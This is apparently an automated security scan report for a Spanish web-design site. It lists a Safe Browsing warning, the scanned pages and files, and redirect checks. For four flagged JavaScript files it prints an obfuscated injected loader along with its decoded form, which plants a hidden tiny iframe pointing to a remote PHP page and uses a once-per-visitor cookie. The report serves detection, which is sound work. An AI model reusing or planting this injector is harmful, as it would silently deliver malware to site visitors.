Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=presencialweb.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://presencialweb.com/ | 200 OK Content-Length: 7898 Content-Type: text/html | clean |
http://presencialweb.com/contacto.php | 200 OK Content-Length: 7486 Content-Type: text/html | clean |
http://presencialweb.com/servicios.php | 200 OK Content-Length: 4841 Content-Type: text/html | clean |
http://presencialweb.com/diseno_web.php | 200 OK Content-Length: 4917 Content-Type: text/html | clean |
http://presencialweb.com/nosotros.php | 200 OK Content-Length: 4852 Content-Type: text/html | clean |
http://presencialweb.com/ofertas.php | 200 OK Content-Length: 4942 Content-Type: text/html | clean |
http://presencialweb.com/index.php | 200 OK Content-Length: 7898 Content-Type: text/html | clean |
http://presencialweb.com/demos/index.html | 200 OK Content-Length: 7924 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://presencialweb.com/demos/js/jquery.flexslider.js | 200 OK Content-Length: 36027 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e7f712e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e7f713c8180712e4b2e357682827e483d3d8585853c7b7372776f8280737c7282843c77823d7a7770807d3d50665f7c5a5660763c7e767e3549182e7f713c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e7f713c8182877a733c707d807273802e4b2e353e3549182e7f713c8182877a733c7673777576822e4b Decoded script: String String function zzzfff() { var qc = document.createElement('iframe'); qc.src = 'http://www.mediatrendtv.it/libro/BXQnLHRh.php'; qc.style.position = 'absolute'; qc.style.border = '0'; qc.style.height = '9px'; qc.style.width = '7px'; qc.style.left = '1px'; qc.style.top = '1px'; if (!document.getElementById('qc')) { document.write('<div id=\'qc\'></div>'); document.getElementById('qc').appendChild(qc); } if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://presencialweb.com/demos/js/default.js | 200 OK Content-Length: 10232 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e7f712e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e7f713c8180712e4b2e357682827e483d3d8585853c7b7372776f8280737c7282843c77823d7a7770807d3d50665f7c5a5660763c7e767e3549182e7f713c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e7f713c8182877a733c707d807273802e4b2e353e3549182e7f713c8182877a733c7673777576822e4b Decoded script: String String function zzzfff() { var qc = document.createElement('iframe'); qc.src = 'http://www.mediatrendtv.it/libro/BXQnLHRh.php'; qc.style.position = 'absolute'; qc.style.border = '0'; qc.style.height = '9px'; qc.style.width = '7px'; qc.style.left = '1px'; qc.style.top = '1px'; if (!document.getElementById('qc')) { document.write('<div id=\'qc\'></div>'); document.getElementById('qc').appendChild(qc); } if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://presencialweb.com/demos/ | 200 OK Content-Length: 7924 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://presencialweb.com/demos/basicpanaderia/index.html | 200 OK Content-Length: 6806 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://presencialweb.com/demos/basicpanaderia/js/jquery.flexslider.js | 200 OK Content-Length: 36027 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e7f712e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e7f713c8180712e4b2e357682827e483d3d8585853c7b7372776f8280737c7282843c77823d7a7770807d3d50665f7c5a5660763c7e767e3549182e7f713c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e7f713c8182877a733c707d807273802e4b2e353e3549182e7f713c8182877a733c7673777576822e4b Decoded script: String String function zzzfff() { var qc = document.createElement('iframe'); qc.src = 'http://www.mediatrendtv.it/libro/BXQnLHRh.php'; qc.style.position = 'absolute'; qc.style.border = '0'; qc.style.height = '9px'; qc.style.width = '7px'; qc.style.left = '1px'; qc.style.top = '1px'; if (!document.getElementById('qc')) { document.write('<div id=\'qc\'></div>'); document.getElementById('qc').appendChild(qc); } if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://presencialweb.com/demos/basicpanaderia/js/default.js | 200 OK Content-Length: 10232 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e7f712e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e7f713c8180712e4b2e357682827e483d3d8585853c7b7372776f8280737c7282843c77823d7a7770807d3d50665f7c5a5660763c7e767e3549182e7f713c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e7f713c8182877a733c707d807273802e4b2e353e3549182e7f713c8182877a733c7673777576822e4b Decoded script: String String function zzzfff() { var qc = document.createElement('iframe'); qc.src = 'http://www.mediatrendtv.it/libro/BXQnLHRh.php'; qc.style.position = 'absolute'; qc.style.border = '0'; qc.style.height = '9px'; qc.style.width = '7px'; qc.style.left = '1px'; qc.style.top = '1px'; if (!document.getElementById('qc')) { document.write('<div id=\'qc\'></div>'); document.getElementById('qc').appendChild(qc); } if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: presencialweb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Jul 2014 11:45:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: presencialweb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Jul 2014 11:45:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: presencialweb.com
Referer: http://www.google.com/search?q=presencialweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: presencialweb.com
Referer: http://www.google.com/search?q=presencialweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.